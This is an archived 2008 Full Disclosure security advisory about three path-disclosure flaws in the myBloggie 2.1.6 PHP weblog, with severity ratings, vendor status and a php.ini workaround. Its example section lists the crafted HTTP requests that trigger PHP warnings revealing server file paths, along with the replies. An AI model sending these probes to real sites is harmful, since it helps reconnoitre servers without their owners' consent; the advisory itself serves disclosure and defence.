Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities
From: securityresearch <securityresearch () netvigilance com>
Date: Mon, 30 Jun 2008 16:14:49 -0400

*netVigilance Security Advisory #39*

*myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities*

*Description:*
myBloggie <http://mywebland.com/download.php?id=19> is considered one of 
the most simple, user-friendliest yet packed with features Weblog system 
available to date. Built using PHP & mySQL, web most popular scripting 
language & database system enable myBloggie to be installed in any 
webservers.

Security problems in the product allow attackers to gather the true path 
of the server-side script.

*External References:*
Mitre CVE: CVE-2007-3650 
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3650> 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3650
NVD NIST: CVE-2007-3650 
<http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3650> 
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-3650

*Summary:*
myBloggie <http://mywebland.com/mybloggie/> 
(http://mywebland.com/mybloggie/) is weblog system built using PHP & 
mySQL, web’s most popular scripting language & database system which 
enable myBloggie to be installed in any web server.

*Advisory URL:*
http://www.netvigilance.com/advisory0039
*
Release Date:* June 30^th 2008

*Severity/Risk:* Medium
* *
*CVSS 2.0 Metrics*
*Access Vector:* Network
*Access Complexity: *Low
*Authentication:* None
*Confidentiality Impact: *Partial
*Integrity Impact: *None
*Availability Impact:* None
*CVSS Base Score: *5.0
* *
*Target Distribution on Internet: *Low
* *
*Exploitability: *Functional* *Exploit
*Remediation Level**: *Workaround
*Report Confidence: *Uncorroborated
* *
*SecureScout Testcase ID:*
TC 17970

*Vulnerable Systems:*
myBloggie <http://mywebland.com/mybloggie/> version 2.1.6

*Vulnerability Type:*
Program flaws – The product scripts have flaws which lead to Warnings or 
even Fatal Errors.

*Vendor:*
myWebland <http://mywebland.com/> (http://mywebland.com/)

*Vendor Status:*
The Vendor has been notified April 9^th 2007, but did not respond.

*Workaround:*
Disable warning messages: modify in the php.ini file following line: 
display_errors = Off.

*Example:*

*
Path Disclosure Vulnerability 1:*

|REQUEST:

(PHP <5.0.0 and Windows Hosting are required)

|http://[TARGET]/[PRODUCT DIRECTORY]/index.php?month_no=2&year=10000

|REPLY:
...
<b>Warning</b>: mktime(): Windows does not support negative values for 
this function in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> 
on line <b>28</b><br />
<b>Warning</b>: date(): Windows does not support dates prior to midnight 
(00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT 
DIRECTORY]\calendar.php</b> on line <b>28</b><br />
...
<b>Warning</b>: mktime(): Windows does not support negative values for 
this function in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\calendar.php</b> 
on line <b>44</b><br />
<b>Warning</b>: date(): Windows does not support dates prior to midnight 
(00:00:00), January 1, 1970 in <b>[DISCLOSED PATH][PRODUCT 
DIRECTORY]\calendar.php</b> on line <b>44</b><br />
...|

*
Path Disclosure Vulnerability 2:*

|REQUEST:
|http://[TARGET]/[PRODUCT DIRECTORY]/common.php

|REPLY:
...
<b>Warning</b>: preg_replace(): Empty regular expression in 
<b>[DISCLOSED PATH][PRODUCT DIRECTORY]\common.php</b> on line 
<b>79</b><br />
...|

*
Path Disclosure Vulnerability 3*

|REQUEST:
|http://[TARGET]/[PRODUCT DIRECTORY]/login.php?mode[]=login

|REPLY:
...
<b>Warning</b>: htmlspecialchars() expects parameter 1 to be string, 
array given in <b>[DISCLOSED PATH][PRODUCT DIRECTORY]\login.php</b> on 
line <b>39</b><br />
...|

*Credits:*
Jesper Jurcenoks
Co-founder netVigilance, Inc
www.netvigilance.com <http://www.netvigilance.com>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • myBloggie version 2.1.6 Multiple Path Disclosure Vulnerabilities securityresearch (Jun 30)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault